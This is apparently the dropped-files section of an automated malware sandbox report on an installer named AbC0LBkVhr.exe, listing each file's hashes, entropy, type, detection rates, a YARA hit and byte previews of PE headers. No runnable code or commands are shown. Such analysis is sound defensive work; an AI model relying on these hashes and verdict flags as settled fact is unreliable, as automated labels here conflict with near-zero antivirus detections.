                                                        SSDEEP:3:LDXdQSWBdMUE/:LLdQSGd
                                                        MD5:4FFFD4D2A32CBF8FB78D521B4CC06680
                                                        SHA1:3FA6EFA82F738740179A9388D8046619C7EBDF54
                                                        SHA-256:EC52F73A17E6AFCF78F3FD8DFC7177024FEB52F5AC2B602886788E4348D5FB68
                                                        SHA-512:130A074E6AD38EEE2FB088BED2FCB939BF316B0FCBB4F5455AB49C2685BEEDCB5011107A22A153E56BF5E54A45CA4801C56936E71899C99BA9A4F694A1D4CC6D
                                                        Malicious:false
                                                        Preview:dad6f9fa0c8327344d1aa24f183c3767................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):2560
                                                        Entropy (8bit):2.8818118453929262
                                                        Encrypted:false
                                                        SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                        MD5:A69559718AB506675E907FE49DEB71E9
                                                        SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                        SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                        SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp
                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):6144
                                                        Entropy (8bit):4.215994423157539
                                                        Encrypted:false
                                                        SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
                                                        MD5:4FF75F505FDDCC6A9AE62216446205D9
                                                        SHA1:EFE32D504CE72F32E92DCF01AA2752B04D81A342
                                                        SHA-256:A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
                                                        SHA-512:BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d...XW:J..........#............................@.............................`..............................................................<!.......P..@....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                        Category:dropped
                                                        Size (bytes):23312
                                                        Entropy (8bit):4.596242908851566
                                                        Encrypted:false
                                                        SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                        MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                        SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                        SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                        SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\Desktop\AbC0LBkVhr.exe
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):704000
                                                        Entropy (8bit):6.506187629302128
                                                        Encrypted:false
                                                        SSDEEP:12288:2/kqO+1G7DMvrP537dzHsA6BllcOuGbnH3ERNIg9rNlQyRvh1K8xyF:GkqZ1G7DMvrP537dzHsA6hcHGbH3Ephs
                                                        MD5:2A520A4553D90F23218A97B9476D232A
                                                        SHA1:1C279178A6B5FFB3FCF6B946C63ABCBC81D6505E
                                                        SHA-256:65BDC20123135632BBE83EBB1EC3E4DC2F29D0446CAA7CE7D02E15954666FA27
                                                        SHA-512:DFDFE497851745CCB3698C574ACACDEDDAD2B830B63C98C52A2B382E4A6EF70FC65F9B98D12B257AE8AC2CD381AD80D9AF912AFA16E14FEAC3E1AEAEC30E5E04
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 4%
                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t........................@..............................................@..............................`%..................................................................................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS.....l................................idata..`%.......&..................@....tls.....................................rdata..............................@..P.reloc..@.... ......................@..P.rsrc...............................@..P.....................J..............@..P........................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp
                                                        File Type:MS Windows HtmlHelp Data
                                                        Category:dropped
                                                        Size (bytes):78183
                                                        Entropy (8bit):7.692742945771669
                                                        Encrypted:false
                                                        SSDEEP:1536:Bkt2SjEQ3r94YqwyadpL1X6Dtn4afF1VowWb8ZmmUQNk3gNqCLbMsFxJse8hbpmn:mR/CYj9dp5XIyI2b/mY3gNjLbMsOaP
                                                        MD5:B1B9E6D43319F6D4E52ED858C5726A97
                                                        SHA1:5033047A30CCCF57783C600FD76A6D220021B19D
                                                        SHA-256:8003A4A0F9F5DFB62BEFBF81F8C05894B0C1F987ACFC8654A6C6CE02B6213910
                                                        SHA-512:E56D6EC9170DEBAC28BB514942F794F73D4C194D04C54EFF9227B6EE3C74BA4FCF239FFF0BB6556DC8B847FA89D382AF206A2C481C41A3510936B0A74192D2C2
                                                        Malicious:false
                                                        Preview:ITSF....`..........E.......|.{.......".....|.{......."..`...............x.......T.......................g1..............ITSP....T...........................................j..].!......."..T...............PMGLW................/..../#IDXHDR...F.../#ITBITS..../#IVB...N$./#STRINGS.....P./#SYSTEM..N.'./#TOPICS...F.0./#URLSTR...:.t./#URLTBL...v.D./$FIftiMain......1./$OBJINST...z.../$WWAssociativeLinks/..../$WWAssociativeLinks/Property...v../$WWKeywordLinks/..../$WWKeywordLinks/Property...r../After.jpg...4..../Auto-.hhc...^./Auto-Adjustment.htm....?./Auto-BleachTeeth.htm...z.3./Auto-Crop2Plus.htm..U.j./Auto-Emphasis.htm...w.V./Auto-EyeColor.htm...!.../Auto-EyePencil.htm..._.../Auto-EyeShadow.htm...,.3./Auto-GettingStarted.htm....Q./Auto-Lipstick.htm..R.M./Auto-Liquify.htm...-.v./Auto-Menu.htm..S.r./Auto-OrderingInformation.htm...Q.../Auto-Overview.htm..^.$./Auto-Powder.htm......./Auto-Resize.htm..s.b./Auto-Rotation.htm..?.e./Auto-Rouge.htm...=.d./Auto-SkinCare.htm...|.{./Auto-SmartPatchCosmet
                                                        Process:C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):265728
                                                        Entropy (8bit):6.4472652154517345
                                                        Encrypted:false
                                                        SSDEEP:6144:Fs7u3JL96d15Y2BmKh678IuYAhN3YCjlgiZioXyLWvCe93rZ5WZOlUmpNJ5mlbb/:e7WJL96d15Y2BmKh678IuYAhN3YCjlgw
                                                        MD5:752CA72DE243F44AF2ED3FF023EF826E
                                                        SHA1:7B508F6B72BD270A861B368EC9FE4BF55D8D472F
                                                        SHA-256:F8196F03F8CBED87A92BA5C1207A9063D4EEBB0C22CA88A279F1AE1B1F1B8196
                                                        SHA-512:4E5A7242C25D4BBF9087F813D4BF057432271A0F08580DA8C894B7C290DE9E0CF640F6F616B0B6C6CAD14DC0AFDD2697D2855BA4070270824540BAE835FE8C4A
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..=...........!................`;.......................................P.......................'..............p...o.......d.... .......................0..\.......................................................4............................text...k........................... ..`.rdata..............................@..@.data....9.......0..................@....idata..............................@....rsrc........ ......................@..@.reloc..T....0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):176128
                                                        Entropy (8bit):6.204917493416147
                                                        Encrypted:false
                                                        SSDEEP:3072:l9iEoC1+7N9UQV2Mi8NTUU3/EO3h3E9y6GeoPRtsoWhi75MUbvSHQ:l+ssU62Mi8x9P/UVGeQRthMUbvS
                                                        MD5:FEC4FF0C2967A05543747E8D552CF9DF
                                                        SHA1:B4449DC0DF8C0AFCC9F32776384A6F5B5CEDE20C
                                                        SHA-256:5374148EBCF4B456F8711516A58C9A007A393CA88F3D9759041F691E4343C7D6
                                                        SHA-512:93E3F48CD393314178CBC86F6142D577D5EAAE52B47C4D947DBA4DFB706860B150FF5B0E546CB83114CA44666E9DF6021964D79D064B775A58698DAA9550EF13
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+0.J^..J^..J^.cE...J^..VR..J^..UU..J^.#VP..J^..UT..J^..UZ..J^..kU..J^..kZ..J^..J_..J^..iT..J^..io..J^.gLX..J^._jZ..J^.Rich.J^.................PE..L.....L...........!.....0...@.......'.......@...................................................................... e..k....X..d....`.......................p..p....................................................@...............................text....".......0.................. ..`.rdata...%...@...0...@..............@..@.data...T....p... ...p..............@....rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp
                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):1645320
                                                        Entropy (8bit):6.787752063353702
                                                        Encrypted:false
                                                        SSDEEP:24576:Fk18V2mHkfIE3Ip9vkWEgDecZV3W9kpOuRw8RhWd5Ixwzr6lOboU7j97S9D+z98v:FZNkf+uW3D1ZVG9kVw8I5Rv6lwH9+X
                                                        MD5:871C903A90C45CA08A9D42803916C3F7
                                                        SHA1:D962A12BC15BFB4C505BB63F603CA211588958DB
                                                        SHA-256:F1DA32183B3DA19F75FA4EF0974A64895266B16D119BBB1DA9FE63867DBA0645
                                                        SHA-512:985B0B8B5E3D96ACFD0514676D9F0C5D2D8F11E31F01ACFA0F7DA9AF3568E12343CA77F541F55EDDA6A0E5C14FE733BDA5DC1C10BB170D40D15B7A60AD000145
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s...7o..7o..7o...L..<o..7o..en...L..$o...L...o...L..6o...L..6o...L..(n...L..6o..Rich7o..................PE..L.....D@...........!.........`.......Q.......`.....p................................................................l...CN..|...x....p...........................s.....8...............................................0............................text...n........................... ..`.data...X...........................@...Shared.......`.......P..............@....rsrc........p... ...`..............@..@.reloc...s..........................@..B................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):499712
                                                        Entropy (8bit):6.414789978441117
                                                        Encrypted:false
                                                        SSDEEP:12288:fJzxYPVsBnxO/R7krZhUgiW6QR7t5k3Ooc8iHkC2eq:fZxvBnxOJ7ki3Ooc8iHkC2e
                                                        MD5:561FA2ABB31DFA8FAB762145F81667C2
                                                        SHA1:C8CCB04EEDAC821A13FAE314A2435192860C72B8
                                                        SHA-256:DF96156F6A548FD6FE5672918DE5AE4509D3C810A57BFFD2A91DE45A3ED5B23B
                                                        SHA-512:7D960AA8E3CCE22D63A6723D7F00C195DE7DE83B877ECA126E339E2D8CC9859E813E05C5C0A5671A75BB717243E9295FD13E5E17D8C6660EB59F5BAEE63A7C43
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................................................................Rich...................PE..L.....w>...........!.................-............:|................................~e..............................$...?...d!..<....`.......................p...0..8...8...............................H............................................text............................... ..`.rdata..2*.......0..................@..@.data...h!...0... ...0..............@....rsrc........`.......P..............@..@.reloc...0...p...@...`..............@..B........................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):3281038
                                                        Entropy (8bit):6.610932603337768
                                                        Encrypted:false
                                                        SSDEEP:98304:aHY4bl5znLaEGzUjIX24RJ4IB//bR6SodyUfalD:aH9l5znLaEGK/Sody9lD
                                                        MD5:AD793723C7B5C71BD389D31B46EFEA2F
                                                        SHA1:D10ECA47CE9632C0B48ED700BC3EE230332214CE
                                                        SHA-256:1420199F25C2C6C8121108CBDF691F12A1570A72B311B7F6C10F5B0061ED6FA8
                                                        SHA-512:DCF2D0547AFAF28D140F54FA4299574AC81CC448487BBF640182CA40B8D402DF4C4508F92EEB394E33B31DE740214B95F9226EE10A78E45E2D08BCCB01CCB99F
                                                        Malicious:false
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\is-3B09G.tmp, Author: Joe Security
                                                        Preview:.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L..._..L.....................T...................@..........................p2......z2.....................................T...........`...............................................................................|..........................._rste_2............................. ..`_rstf_2.............................@..@_rstg_2..d... ...0..................@....rsrc................6..............@..@_rsth_2...!..p.... .................`...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):445440
                                                        Entropy (8bit):6.439135831549689
                                                        Encrypted:false
                                                        SSDEEP:12288:sosmML3+OytpWFkCU1wayvT33iiDNmAE27R9sY9kP0O+:soslvJ3RaY9wU
                                                        MD5:CAC7E17311797C5471733638C0DC1F01
                                                        SHA1:58E0BD1B63525A2955439CB9BE3431CEA7FF1121
                                                        SHA-256:19248357ED7CFF72DEAD18B5743BF66C61438D68374BDA59E3B9D444C6F8F505
                                                        SHA-512:A677319AC8A2096D95FFC69F22810BD4F083F6BF55B8A77F20D8FB8EE01F2FEE619CE318D1F55C392A8F3A4D635D9285712E2C572E62997014641C36EDC060A2
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*..=...........!.........\......@!....................................... .......................'..........................P.......H.......................l....................................................................................text............................... ..`.rdata..2$.......&..................@..@.data...............................@....idata..............................@....rsrc...H...........................@..@.reloc...&.......(..................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp
                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):1645320
                                                        Entropy (8bit):6.787752063353702
                                                        Encrypted:false
                                                        SSDEEP:24576:Fk18V2mHkfIE3Ip9vkWEgDecZV3W9kpOuRw8RhWd5Ixwzr6lOboU7j97S9D+z98v:FZNkf+uW3D1ZVG9kVw8I5Rv6lwH9+X
                                                        MD5:871C903A90C45CA08A9D42803916C3F7
                                                        SHA1:D962A12BC15BFB4C505BB63F603CA211588958DB
                                                        SHA-256:F1DA32183B3DA19F75FA4EF0974A64895266B16D119BBB1DA9FE63867DBA0645
                                                        SHA-512:985B0B8B5E3D96ACFD0514676D9F0C5D2D8F11E31F01ACFA0F7DA9AF3568E12343CA77F541F55EDDA6A0E5C14FE733BDA5DC1C10BB170D40D15B7A60AD000145
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s...7o..7o..7o...L..<o..7o..en...L..$o...L...o...L..6o...L..6o...L..(n...L..6o..Rich7o..................PE..L.....D@...........!.........`.......Q.......`.....p................................................................l...CN..|...x....p...........................s.....8...............................................0............................text...n........................... ..`.data...X...........................@...Shared.......`.......P..............@....rsrc........p... ...`..............@..@.reloc...s..........................@..B................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):348160
                                                        Entropy (8bit):6.542655141037356
                                                        Encrypted:false
                                                        SSDEEP:6144:OcV9z83OtqxnEYmt3NEnvfF+Tbmbw6An8FMciFMNrb3YgxxpbCAOxO2ElvlE:Ooz83OtIEzW+/m/AyF7bCrO/E
                                                        MD5:86F1895AE8C5E8B17D99ECE768A70732
                                                        SHA1:D5502A1D00787D68F548DDEEBBDE1ECA5E2B38CA
                                                        SHA-256:8094AF5EE310714CAEBCCAEEE7769FFB08048503BA478B879EDFEF5F1A24FEFE
                                                        SHA-512:3B7CE2B67056B6E005472B73447D2226677A8CADAE70428873F7EFA5ED11A3B3DBF6B1A42C5B05B1F2B1D8E06FF50DFC6532F043AF8452ED87687EEFBF1791DA
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2..S..S..S..Tp..S..S..5S..BX..S..BX...S..BX..Q..BX..S..BX..S..BX..S..Rich.S..........................PE..L.....V>...........!................."............4|.........................`......................................t....C......(.... .......................0..d+..H...8...........................x...H...............l............................text............................... ..`.rdata..@...........................@..@.data... h.......`..................@....rsrc........ ......................@..@.reloc..d+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp
                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):645592
                                                        Entropy (8bit):6.50414583238337
                                                        Encrypted:false
                                                        SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                        MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                        SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                        SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                        SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..
                                                        Process:C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp
                                                        File Type:MS Windows HtmlHelp Data
                                                        Category:dropped
                                                        Size (bytes):78183
                                                        Entropy (8bit):7.692742945771669
                                                        Encrypted:false
                                                        SSDEEP:1536:Bkt2SjEQ3r94YqwyadpL1X6Dtn4afF1VowWb8ZmmUQNk3gNqCLbMsFxJse8hbpmn:mR/CYj9dp5XIyI2b/mY3gNjLbMsOaP
                                                        MD5:B1B9E6D43319F6D4E52ED858C5726A97
                                                        SHA1:5033047A30CCCF57783C600FD76A6D220021B19D
                                                        SHA-256:8003A4A0F9F5DFB62BEFBF81F8C05894B0C1F987ACFC8654A6C6CE02B6213910
                                                        SHA-512:E56D6EC9170DEBAC28BB514942F794F73D4C194D04C54EFF9227B6EE3C74BA4FCF239FFF0BB6556DC8B847FA89D382AF206A2C481C41A3510936B0A74192D2C2
                                                        Malicious:false
                                                        Preview:ITSF....`..........E.......|.{.......".....|.{......."..`...............x.......T.......................g1..............ITSP....T...........................................j..].!......."..T...............PMGLW................/..../#IDXHDR...F.../#ITBITS..../#IVB...N$./#STRINGS.....P./#SYSTEM..N.'./#TOPICS...F.0./#URLSTR...:.t./#URLTBL...v.D./$FIftiMain......1./$OBJINST...z.../$WWAssociativeLinks/..../$WWAssociativeLinks/Property...v../$WWKeywordLinks/..../$WWKeywordLinks/Property...r../After.jpg...4..../Auto-.hhc...^./Auto-Adjustment.htm....?./Auto-BleachTeeth.htm...z.3./Auto-Crop2Plus.htm..U.j./Auto-Emphasis.htm...w.V./Auto-EyeColor.htm...!.../Auto-EyePencil.htm..._.../Auto-EyeShadow.htm...,.3./Auto-GettingStarted.htm....Q./Auto-Lipstick.htm..R.M./Auto-Liquify.htm...-.v./Auto-Menu.htm..S.r./Auto-OrderingInformation.htm...Q.../Auto-Overview.htm..^.$./Auto-Powder.htm......./Auto-Resize.htm..s.b./Auto-Rotation.htm..?.e./Auto-Rouge.htm...=.d./Auto-SkinCare.htm...|.{./Auto-SmartPatchCosmet
                                                        Process:C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):265728
                                                        Entropy (8bit):6.4472652154517345
                                                        Encrypted:false
                                                        SSDEEP:6144:Fs7u3JL96d15Y2BmKh678IuYAhN3YCjlgiZioXyLWvCe93rZ5WZOlUmpNJ5mlbb/:e7WJL96d15Y2BmKh678IuYAhN3YCjlgw
                                                        MD5:752CA72DE243F44AF2ED3FF023EF826E
                                                        SHA1:7B508F6B72BD270A861B368EC9FE4BF55D8D472F
                                                        SHA-256:F8196F03F8CBED87A92BA5C1207A9063D4EEBB0C22CA88A279F1AE1B1F1B8196
                                                        SHA-512:4E5A7242C25D4BBF9087F813D4BF057432271A0F08580DA8C894B7C290DE9E0CF640F6F616B0B6C6CAD14DC0AFDD2697D2855BA4070270824540BAE835FE8C4A
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..=...........!................`;.......................................P.......................'..............p...o.......d.... .......................0..\.......................................................4............................text...k........................... ..`.rdata..............................@..@.data....9.......0..................@....idata..............................@....rsrc........ ......................@..@.reloc..T....0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):176128
                                                        Entropy (8bit):6.204917493416147
                                                        Encrypted:false
                                                        SSDEEP:3072:l9iEoC1+7N9UQV2Mi8NTUU3/EO3h3E9y6GeoPRtsoWhi75MUbvSHQ:l+ssU62Mi8x9P/UVGeQRthMUbvS
                                                        MD5:FEC4FF0C2967A05543747E8D552CF9DF
                                                        SHA1:B4449DC0DF8C0AFCC9F32776384A6F5B5CEDE20C
                                                        SHA-256:5374148EBCF4B456F8711516A58C9A007A393CA88F3D9759041F691E4343C7D6
                                                        SHA-512:93E3F48CD393314178CBC86F6142D577D5EAAE52B47C4D947DBA4DFB706860B150FF5B0E546CB83114CA44666E9DF6021964D79D064B775A58698DAA9550EF13
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+0.J^..J^..J^.cE...J^..VR..J^..UU..J^.#VP..J^..UT..J^..UZ..J^..kU..J^..kZ..J^..J_..J^..iT..J^..io..J^.gLX..J^._jZ..J^.Rich.J^.................PE..L.....L...........!.....0...@.......'.......@...................................................................... e..k....X..d....`.......................p..p....................................................@...............................text....".......0.................. ..`.rdata...%...@...0...@..............@..@.data...T....p... ...p..............@....rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):445440
                                                        Entropy (8bit):6.439135831549689
                                                        Encrypted:false
                                                        SSDEEP:12288:sosmML3+OytpWFkCU1wayvT33iiDNmAE27R9sY9kP0O+:soslvJ3RaY9wU
                                                        MD5:CAC7E17311797C5471733638C0DC1F01
                                                        SHA1:58E0BD1B63525A2955439CB9BE3431CEA7FF1121
                                                        SHA-256:19248357ED7CFF72DEAD18B5743BF66C61438D68374BDA59E3B9D444C6F8F505
                                                        SHA-512:A677319AC8A2096D95FFC69F22810BD4F083F6BF55B8A77F20D8FB8EE01F2FEE619CE318D1F55C392A8F3A4D635D9285712E2C572E62997014641C36EDC060A2
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*..=...........!.........\......@!....................................... .......................'..........................P.......H.......................l....................................................................................text............................... ..`.rdata..2$.......&..................@..@.data...............................@....idata..............................@....rsrc...H...........................@..@.reloc...&.......(..................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):499712
                                                        Entropy (8bit):6.414789978441117
                                                        Encrypted:false
                                                        SSDEEP:12288:fJzxYPVsBnxO/R7krZhUgiW6QR7t5k3Ooc8iHkC2eq:fZxvBnxOJ7ki3Ooc8iHkC2e
                                                        MD5:561FA2ABB31DFA8FAB762145F81667C2
                                                        SHA1:C8CCB04EEDAC821A13FAE314A2435192860C72B8
                                                        SHA-256:DF96156F6A548FD6FE5672918DE5AE4509D3C810A57BFFD2A91DE45A3ED5B23B
                                                        SHA-512:7D960AA8E3CCE22D63A6723D7F00C195DE7DE83B877ECA126E339E2D8CC9859E813E05C5C0A5671A75BB717243E9295FD13E5E17D8C6660EB59F5BAEE63A7C43
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................................................................Rich...................PE..L.....w>...........!.................-............:|................................~e..............................$...?...d!..<....`.......................p...0..8...8...............................H............................................text............................... ..`.rdata..2*.......0..................@..@.data...h!...0... ...0..............@....rsrc........`.......P..............@..@.reloc...0...p...@...`..............@..B........................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):348160
                                                        Entropy (8bit):6.542655141037356
                                                        Encrypted:false
                                                        SSDEEP:6144:OcV9z83OtqxnEYmt3NEnvfF+Tbmbw6An8FMciFMNrb3YgxxpbCAOxO2ElvlE:Ooz83OtIEzW+/m/AyF7bCrO/E
                                                        MD5:86F1895AE8C5E8B17D99ECE768A70732
                                                        SHA1:D5502A1D00787D68F548DDEEBBDE1ECA5E2B38CA
                                                        SHA-256:8094AF5EE310714CAEBCCAEEE7769FFB08048503BA478B879EDFEF5F1A24FEFE
